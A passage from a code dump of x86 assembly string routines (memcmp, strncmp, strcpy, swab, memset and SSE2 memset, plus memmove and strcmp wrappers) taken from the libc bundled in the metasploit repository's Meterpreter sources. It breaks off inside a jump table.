je L(38bytes)
jmp L(39bytes)
ALIGN (4)
L(more40bytes):
cmp $40, %ecx
je L(40bytes)
cmp $41, %ecx
je L(41bytes)
cmp $42, %ecx
je L(42bytes)
cmp $43, %ecx
je L(43bytes)
cmp $44, %ecx
je L(44bytes)
cmp $45, %ecx
je L(45bytes)
cmp $46, %ecx
je L(46bytes)
jmp L(47bytes)
ALIGN (4)
L(less48bytes):
cmp $8, %ecx
jae L(more8bytes)
cmp $2, %ecx
je L(2bytes)
cmp $3, %ecx
je L(3bytes)
cmp $4, %ecx
je L(4bytes)
cmp $5, %ecx
je L(5bytes)
cmp $6, %ecx
je L(6bytes)
jmp L(7bytes)
ALIGN (4)
L(44bytes):
mov -44(%eax), %ecx
mov -44(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(40bytes):
mov -40(%eax), %ecx
mov -40(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(36bytes):
mov -36(%eax), %ecx
mov -36(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(32bytes):
mov -32(%eax), %ecx
mov -32(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(28bytes):
mov -28(%eax), %ecx
mov -28(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(24bytes):
mov -24(%eax), %ecx
mov -24(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(20bytes):
mov -20(%eax), %ecx
mov -20(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(16bytes):
mov -16(%eax), %ecx
mov -16(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(12bytes):
mov -12(%eax), %ecx
mov -12(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(8bytes):
mov -8(%eax), %ecx
mov -8(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(4bytes):
mov -4(%eax), %ecx
mov -4(%edx), %ebx
cmp %ebx, %ecx
mov $0, %eax
jne L(find_diff)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(45bytes):
mov -45(%eax), %ecx
mov -45(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(41bytes):
mov -41(%eax), %ecx
mov -41(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(37bytes):
mov -37(%eax), %ecx
mov -37(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(33bytes):
mov -33(%eax), %ecx
mov -33(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(29bytes):
mov -29(%eax), %ecx
mov -29(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(25bytes):
mov -25(%eax), %ecx
mov -25(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(21bytes):
mov -21(%eax), %ecx
mov -21(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(17bytes):
mov -17(%eax), %ecx
mov -17(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(13bytes):
mov -13(%eax), %ecx
mov -13(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(9bytes):
mov -9(%eax), %ecx
mov -9(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(5bytes):
mov -5(%eax), %ecx
mov -5(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
movzbl -1(%eax), %ecx
cmp -1(%edx), %cl
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(46bytes):
mov -46(%eax), %ecx
mov -46(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(42bytes):
mov -42(%eax), %ecx
mov -42(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(38bytes):
mov -38(%eax), %ecx
mov -38(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(34bytes):
mov -34(%eax), %ecx
mov -34(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(30bytes):
mov -30(%eax), %ecx
mov -30(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(26bytes):
mov -26(%eax), %ecx
mov -26(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(22bytes):
mov -22(%eax), %ecx
mov -22(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(18bytes):
mov -18(%eax), %ecx
mov -18(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(14bytes):
mov -14(%eax), %ecx
mov -14(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(10bytes):
mov -10(%eax), %ecx
mov -10(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(6bytes):
mov -6(%eax), %ecx
mov -6(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(2bytes):
movzwl -2(%eax), %ecx
movzwl -2(%edx), %ebx
cmp %bl, %cl
jne L(end)
cmp %bh, %ch
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(47bytes):
movl -47(%eax), %ecx
movl -47(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(43bytes):
movl -43(%eax), %ecx
movl -43(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(39bytes):
movl -39(%eax), %ecx
movl -39(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(35bytes):
movl -35(%eax), %ecx
movl -35(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(31bytes):
movl -31(%eax), %ecx
movl -31(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(27bytes):
movl -27(%eax), %ecx
movl -27(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(23bytes):
movl -23(%eax), %ecx
movl -23(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(19bytes):
movl -19(%eax), %ecx
movl -19(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(15bytes):
movl -15(%eax), %ecx
movl -15(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(11bytes):
movl -11(%eax), %ecx
movl -11(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(7bytes):
movl -7(%eax), %ecx
movl -7(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(3bytes):
movzwl -3(%eax), %ecx
movzwl -3(%edx), %ebx
cmpb %bl, %cl
jne L(end)
cmp %bx, %cx
jne L(end)
movzbl -1(%eax), %eax
cmpb -1(%edx), %al
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(find_diff):
cmpb %bl, %cl
jne L(end)
cmp %bx, %cx
jne L(end)
shr $16,%ecx
shr $16,%ebx
cmp %bl, %cl
jne L(end)
cmp %bx, %cx
L(end):
POP (%ebx)
mov $1, %eax
ja L(bigger)
neg %eax
L(bigger):
ret
END (MEMCMP)
|
OpenWireSec/metasploit | 1,510 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strncmp.S | /* $OpenBSD: strncmp.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
ENTRY(strncmp)
pushl %ebx
movl 8(%esp),%eax
movl 12(%esp),%ecx
movl 16(%esp),%edx
testl %edx,%edx
jmp L2 /* Jump into the loop! */
.align 2,0x90
L1: incl %eax
incl %ecx
decl %edx
L2: jz L4 /* strings are equal */
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
jne L3
incl %eax
incl %ecx
decl %edx
jz L4
movb (%eax),%bl
testb %bl,%bl
jz L3
cmpb %bl,(%ecx)
je L1
.align 2,0x90
L3: movzbl (%eax),%eax /* unsigned comparision */
movzbl (%ecx),%ecx
subl %ecx,%eax
popl %ebx
ret
.align 2,0x90
L4: xorl %eax,%eax
popl %ebx
ret
|
OpenWireSec/metasploit | 1,711 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memmove_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# include "cache_wrapper.S"
# undef __i686
# define MEMCPY memmove
# define USE_AS_MEMMOVE
# include "ssse3-memcpy5.S"
#else
# include "memmove.S"
#endif
|
OpenWireSec/metasploit | 1,179 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcpy.S | /* $OpenBSD: strcpy.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
#if defined(APIWARN)
#APP
.section .gnu.warning.strcpy
.ascii "warning: strcpy() is almost always misused, please use strlcpy()"
#NO_APP
#endif
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
ENTRY(strcpy)
movl 4(%esp),%ecx /* dst address */
movl 8(%esp),%edx /* src address */
pushl %ecx /* push dst address */
.align 2,0x90
L1: movb (%edx),%al /* unroll loop, but not too much */
movb %al,(%ecx)
testb %al,%al
jz L2
movb 1(%edx),%al
movb %al,1(%ecx)
testb %al,%al
jz L2
movb 2(%edx),%al
movb %al,2(%ecx)
testb %al,%al
jz L2
movb 3(%edx),%al
movb %al,3(%ecx)
testb %al,%al
jz L2
movb 4(%edx),%al
movb %al,4(%ecx)
testb %al,%al
jz L2
movb 5(%edx),%al
movb %al,5(%ecx)
testb %al,%al
jz L2
movb 6(%edx),%al
movb %al,6(%ecx)
testb %al,%al
jz L2
movb 7(%edx),%al
movb %al,7(%ecx)
addl $8,%edx
addl $8,%ecx
testb %al,%al
jnz L1
L2: popl %eax /* pop dst address */
ret
|
OpenWireSec/metasploit | 1,068 | external/source/meterpreter/source/bionic/libc/arch-x86/string/swab.S | /* $OpenBSD: swab.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* On the i486, this code is negligibly faster than the code generated
* by gcc at about half the size. If my i386 databook is correct, it
* should be considerably faster than the gcc code on a i386.
*/
ENTRY(swab)
pushl %esi
pushl %edi
movl 12(%esp),%esi
movl 16(%esp),%edi
movl 20(%esp),%ecx
cld # set direction forward
shrl $1,%ecx
testl $7,%ecx # copy first group of 1 to 7 words
jz L2 # while swaping alternate bytes.
.align 2,0x90
L1: lodsw
rorw $8,%ax
stosw
decl %ecx
testl $7,%ecx
jnz L1
L2: shrl $3,%ecx # copy remainder 8 words at a time
jz L4 # while swapping alternate bytes.
.align 2,0x90
L3: lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
lodsw
rorw $8,%ax
stosw
decl %ecx
jnz L3
L4: popl %edi
popl %esi
ret
|
OpenWireSec/metasploit | 1,033 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memset.S | /* $OpenBSD: memset.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
ENTRY(memset)
pushl %edi
pushl %ebx
movl 12(%esp),%edi
movzbl 16(%esp),%eax /* unsigned char, zero extend */
movl 20(%esp),%ecx
pushl %edi /* push address of buffer */
cld /* set fill direction forward */
/*
* if the string is too short, it's really not worth the overhead
* of aligning to word boundries, etc. So we jump to a plain
* unaligned set.
*/
cmpl $0x0f,%ecx
jle L1
movb %al,%ah /* copy char to all bytes in word */
movl %eax,%edx
sall $16,%eax
orl %edx,%eax
movl %edi,%edx /* compute misalignment */
negl %edx
andl $3,%edx
movl %ecx,%ebx
subl %edx,%ebx
movl %edx,%ecx /* set until word aligned */
rep
stosb
movl %ebx,%ecx
shrl $2,%ecx /* set by words */
rep
stosl
movl %ebx,%ecx /* set remainder by bytes */
andl $3,%ecx
L1: rep
stosb
popl %eax /* pop address of buffer */
popl %ebx
popl %edi
ret
|
OpenWireSec/metasploit | 1,654 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# define ssse3_strcmp_latest strcmp
# include "ssse3-strcmp.S"
#else
# include "strcmp.S"
#endif
|
OpenWireSec/metasploit | 25,574 | external/source/meterpreter/source/bionic/libc/arch-x86/string/sse2-memset5-atom.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef L
# define L(label) .L##label
#endif
#ifndef ALIGN
# define ALIGN(n) .p2align n
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
#define CFI_PUSH(REG) \
cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
#ifdef USE_AS_BZERO
# define DEST PARMS
# define LEN DEST+4
# define SETRTNVAL
#else
# define DEST PARMS
# define CHR DEST+4
# define LEN CHR+4
# define SETRTNVAL movl DEST(%esp), %eax
#endif
#ifdef SHARED
# define ENTRANCE PUSH (%ebx);
# define RETURN_END POP (%ebx); ret
# define RETURN RETURN_END; CFI_PUSH (%ebx)
# define PARMS 8 /* Preserve EBX. */
# define JMPTBL(I, B) I - B
/* Load an entry in a jump table into EBX and branch to it. TABLE is a
jump table with relative offsets. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE) \
/* We first load PC into EBX. */ \
call __i686.get_pc_thunk.bx; \
/* Get the address of the jump table. */ \
add $(TABLE - .), %ebx; \
/* Get the entry and convert the relative offset to the \
absolute address. */ \
add (%ebx,%ecx,4), %ebx; \
add %ecx, %edx; \
/* We loaded the jump table and adjuested EDX. Go. */ \
jmp *%ebx
.section .gnu.linkonce.t.__i686.get_pc_thunk.bx,"ax",@progbits
.globl __i686.get_pc_thunk.bx
.hidden __i686.get_pc_thunk.bx
ALIGN (4)
.type __i686.get_pc_thunk.bx,@function
__i686.get_pc_thunk.bx:
movl (%esp), %ebx
ret
#else
# define ENTRANCE
# define RETURN_END ret
# define RETURN RETURN_END
# define PARMS 4
# define JMPTBL(I, B) I
/* Branch to an entry in a jump table. TABLE is a jump table with
absolute offsets. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE) \
add %ecx, %edx; \
jmp *TABLE(,%ecx,4)
#endif
.section .text.sse2,"ax",@progbits
ALIGN (4)
ENTRY (sse2_memset5_atom)
ENTRANCE
movl LEN(%esp), %ecx
#ifdef USE_AS_BZERO
xor %eax, %eax
#else
movzbl CHR(%esp), %eax
movb %al, %ah
/* Fill the whole EAX with pattern. */
movl %eax, %edx
shl $16, %eax
or %edx, %eax
#endif
movl DEST(%esp), %edx
cmp $32, %ecx
jae L(32bytesormore)
L(write_less32bytes):
BRANCH_TO_JMPTBL_ENTRY (L(table_less_32bytes))
.pushsection .rodata.sse2,"a",@progbits
ALIGN (2)
L(table_less_32bytes):
.int JMPTBL (L(write_0bytes), L(table_less_32bytes))
.int JMPTBL (L(write_1bytes), L(table_less_32bytes))
.int JMPTBL (L(write_2bytes), L(table_less_32bytes))
.int JMPTBL (L(write_3bytes), L(table_less_32bytes))
.int JMPTBL (L(write_4bytes), L(table_less_32bytes))
.int JMPTBL (L(write_5bytes), L(table_less_32bytes))
.int JMPTBL (L(write_6bytes), L(table_less_32bytes))
.int JMPTBL (L(write_7bytes), L(table_less_32bytes))
.int JMPTBL (L(write_8bytes), L(table_less_32bytes))
.int JMPTBL (L(write_9bytes), L(table_less_32bytes))
.int JMPTBL (L(write_10bytes), L(table_less_32bytes))
.int JMPTBL (L(write_11bytes), L(table_less_32bytes))
.int JMPTBL (L(write_12bytes), L(table_less_32bytes))
.int JMPTBL (L(write_13bytes), L(table_less_32bytes))
.int JMPTBL (L(write_14bytes), L(table_less_32bytes))
.int JMPTBL (L(write_15bytes), L(table_less_32bytes))
.int JMPTBL (L(write_16bytes), L(table_less_32bytes))
.int JMPTBL (L(write_17bytes), L(table_less_32bytes))
.int JMPTBL (L(write_18bytes), L(table_less_32bytes))
.int JMPTBL (L(write_19bytes), L(table_less_32bytes))
.int JMPTBL (L(write_20bytes), L(table_less_32bytes))
.int JMPTBL (L(write_21bytes), L(table_less_32bytes))
.int JMPTBL (L(write_22bytes), L(table_less_32bytes))
.int JMPTBL (L(write_23bytes), L(table_less_32bytes))
.int JMPTBL (L(write_24bytes), L(table_less_32bytes))
.int JMPTBL (L(write_25bytes), L(table_less_32bytes))
.int JMPTBL (L(write_26bytes), L(table_less_32bytes))
.int JMPTBL (L(write_27bytes), L(table_less_32bytes))
.int JMPTBL (L(write_28bytes), L(table_less_32bytes))
.int JMPTBL (L(write_29bytes), L(table_less_32bytes))
.int JMPTBL (L(write_30bytes), L(table_less_32bytes))
.int JMPTBL (L(write_31bytes), L(table_less_32bytes))
.popsection
ALIGN (4)
L(write_28bytes):
movl %eax, -28(%edx)
L(write_24bytes):
movl %eax, -24(%edx)
L(write_20bytes):
movl %eax, -20(%edx)
L(write_16bytes):
movl %eax, -16(%edx)
L(write_12bytes):
movl %eax, -12(%edx)
L(write_8bytes):
movl %eax, -8(%edx)
L(write_4bytes):
movl %eax, -4(%edx)
L(write_0bytes):
SETRTNVAL
RETURN
ALIGN (4)
L(write_29bytes):
movl %eax, -29(%edx)
L(write_25bytes):
movl %eax, -25(%edx)
L(write_21bytes):
movl %eax, -21(%edx)
L(write_17bytes):
movl %eax, -17(%edx)
L(write_13bytes):
movl %eax, -13(%edx)
L(write_9bytes):
movl %eax, -9(%edx)
L(write_5bytes):
movl %eax, -5(%edx)
L(write_1bytes):
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(write_30bytes):
movl %eax, -30(%edx)
L(write_26bytes):
movl %eax, -26(%edx)
L(write_22bytes):
movl %eax, -22(%edx)
L(write_18bytes):
movl %eax, -18(%edx)
L(write_14bytes):
movl %eax, -14(%edx)
L(write_10bytes):
movl %eax, -10(%edx)
L(write_6bytes):
movl %eax, -6(%edx)
L(write_2bytes):
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(write_31bytes):
movl %eax, -31(%edx)
L(write_27bytes):
movl %eax, -27(%edx)
L(write_23bytes):
movl %eax, -23(%edx)
L(write_19bytes):
movl %eax, -19(%edx)
L(write_15bytes):
movl %eax, -15(%edx)
L(write_11bytes):
movl %eax, -11(%edx)
L(write_7bytes):
movl %eax, -7(%edx)
L(write_3bytes):
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* ECX > 32 and EDX is 4 byte aligned. */
L(32bytesormore):
/* Fill xmm0 with the pattern. */
#ifdef USE_AS_BZERO
pxor %xmm0, %xmm0
#else
movd %eax, %xmm0
punpcklbw %xmm0, %xmm0
pshufd $0, %xmm0, %xmm0
#endif
testl $0xf, %edx
jz L(aligned_16)
/* ECX > 32 and EDX is not 16 byte aligned. */
L(not_aligned_16):
movdqu %xmm0, (%edx)
movl %edx, %eax
and $-16, %edx
add $16, %edx
sub %edx, %eax
add %eax, %ecx
movd %xmm0, %eax
ALIGN (4)
L(aligned_16):
cmp $128, %ecx
jae L(128bytesormore)
L(aligned_16_less128bytes):
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
ALIGN (4)
L(128bytesormore):
#ifdef SHARED_CACHE_SIZE
PUSH (%ebx)
mov $SHARED_CACHE_SIZE, %ebx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
mov __x86_shared_cache_size@GOTOFF(%ebx), %ebx
# else
PUSH (%ebx)
mov __x86_shared_cache_size, %ebx
# endif
#endif
cmp %ebx, %ecx
jae L(128bytesormore_nt_start)
#ifdef DATA_CACHE_SIZE
POP (%ebx)
cmp $DATA_CACHE_SIZE, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_data_cache_size@GOTOFF(%ebx), %ecx
# else
POP (%ebx)
cmp __x86_data_cache_size, %ecx
# endif
#endif
jae L(128bytes_L2_normal)
subl $128, %ecx
L(128bytesormore_normal):
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
lea 128(%edx), %edx
jb L(128bytesless_normal)
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
lea 128(%edx), %edx
jae L(128bytesormore_normal)
L(128bytesless_normal):
lea 128(%ecx), %ecx
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
ALIGN (4)
L(128bytes_L2_normal):
prefetcht0 0x380(%edx)
prefetcht0 0x3c0(%edx)
sub $128, %ecx
movdqa %xmm0, (%edx)
movaps %xmm0, 0x10(%edx)
movaps %xmm0, 0x20(%edx)
movaps %xmm0, 0x30(%edx)
movaps %xmm0, 0x40(%edx)
movaps %xmm0, 0x50(%edx)
movaps %xmm0, 0x60(%edx)
movaps %xmm0, 0x70(%edx)
add $128, %edx
cmp $128, %ecx
jae L(128bytes_L2_normal)
L(128bytesless_L2_normal):
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
L(128bytesormore_nt_start):
sub %ebx, %ecx
ALIGN (4)
L(128bytesormore_shared_cache_loop):
prefetcht0 0x3c0(%edx)
prefetcht0 0x380(%edx)
sub $0x80, %ebx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
add $0x80, %edx
cmp $0x80, %ebx
jae L(128bytesormore_shared_cache_loop)
cmp $0x80, %ecx
jb L(shared_cache_loop_end)
ALIGN (4)
L(128bytesormore_nt):
sub $0x80, %ecx
movntdq %xmm0, (%edx)
movntdq %xmm0, 0x10(%edx)
movntdq %xmm0, 0x20(%edx)
movntdq %xmm0, 0x30(%edx)
movntdq %xmm0, 0x40(%edx)
movntdq %xmm0, 0x50(%edx)
movntdq %xmm0, 0x60(%edx)
movntdq %xmm0, 0x70(%edx)
add $0x80, %edx
cmp $0x80, %ecx
jae L(128bytesormore_nt)
sfence
L(shared_cache_loop_end):
#if defined DATA_CACHE_SIZE || !defined SHARED
POP (%ebx)
#endif
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
.pushsection .rodata.sse2,"a",@progbits
ALIGN (2)
L(table_16_128bytes):
.int JMPTBL (L(aligned_16_0bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_1bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_2bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_3bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_4bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_5bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_6bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_7bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_8bytes), L(table_16_128bytes))
